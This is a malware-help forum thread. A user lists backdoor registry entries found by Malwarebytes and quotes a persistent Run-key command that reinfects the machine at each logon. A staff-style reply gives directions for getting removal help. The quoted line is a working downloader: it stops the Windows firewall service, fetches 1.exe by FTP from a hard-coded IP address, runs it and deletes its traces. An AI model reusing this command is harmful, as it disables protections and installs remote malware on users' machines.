Did not clean it all

Recommended Posts

I just used the pro version (ID: XXXXX-XXXXX)

It found (from the log file):

====

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Ball (Backdoor.Agent)

HKEY_CLASSES_ROOT\CLSID\{FD2280A8-51A4-11D2-A601-3078302C2030} (Backdoor.Bot)

HKEY_CLASSES_ROOT\CLSID\{9036b028-a780-11d0-9b3d-0080c710ef95} (Backdoor.Bot)

HKEY_CLASSES_ROOT\TypeLib\{49d704a0-89f7-11d0-8527-00c04fd8d503} (Backdoor.Bot).

HKEY_CLASSES_ROOT\Interface\{4B42E390-0E96-11D1-9C3F-00A0C922E703} (Backdoor.Bot)

====

BUT!! I was infected again every time I logon to the computer.

I found on hklm\software\microsoft\windows\currentversoin\run a shell key with this in the regkey:

c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 113.10.155.122> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&ex

Best regards

Welcome Didi -

First make sure your Antivirus program is fully updated, and it will scan fully. This is also required with Malwarebytes Antimalware.

As we do not diagnose infections on this section of the forum, you wll always have Full Free Company Support -

Please follow the directions below and choose the Free option of support you wish either here or by personal email support -

OPTION 1

As we don't deal with malware removal in this General Malwarebytes' Anti-Malware Forum, you need to start a topic in the Malware Removal forum so that a qualified helper can help you fix any malware related problems/infections you may have.

  • First, please print out, read and follow the directions here, skipping any steps you are unable to complete.
  • Then please post a NEW topic here.
  • When posting your new thread, please make sure that, under "options", you select Track this topic and choose Immediate Email Notification, so that you're alerted when someone has replied to your post.
  • One of the expert helpers there will give you free, one-on-one assistance when one becomes available.
  • Please refrain from making any further changes to your computer such as (Install/Uninstall programs, use special fix tools, delete files, edit the registry, etc...) unless advised by a malware removal helper. Doing so can result in system changes which may hinder the attempts by a helper to clean your machine.

NOTE: Please DO NOT post back to ("bump") your topic within the first 48 hours.

Replying to your own posts changes the post count and helpers are looking for topics with zero replies. If you reply to your own post, helpers may think that you're already being helped and thus overlook your post.

  • o If there is no reply from any experts after 48 hours, you can reply to the topic, asking for help again.
    Or
    o You may send a Private Message to a Moderator asking for assistance.

OPTION 2

Alternatively, as a paying customer using MBAM PRO, you can contact the help desk at support@malwarebytes.org or here.

From a non company helper showing you the better options to follow -

Thanking You -
